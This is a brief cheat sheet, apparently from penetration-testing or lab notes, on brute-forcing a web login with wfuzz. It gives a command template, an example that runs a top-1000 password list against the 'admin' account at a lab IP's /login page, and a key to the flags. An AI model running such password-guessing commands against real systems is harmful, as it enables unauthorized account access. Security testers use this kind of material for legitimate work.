WFUZZ Brute Forcing

wfuzz -c --hw <word length> -w <wordlist> -d '<post data>' <url>

e.g.

wfuzz -c --hw 36 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

Key

-c: output with colors

-w: wordlist

-d: POST data

FUZZ: tells wfuzz where to fuzz with your wordlist

--hw <word length>: hide responses that contain this number of words from the output
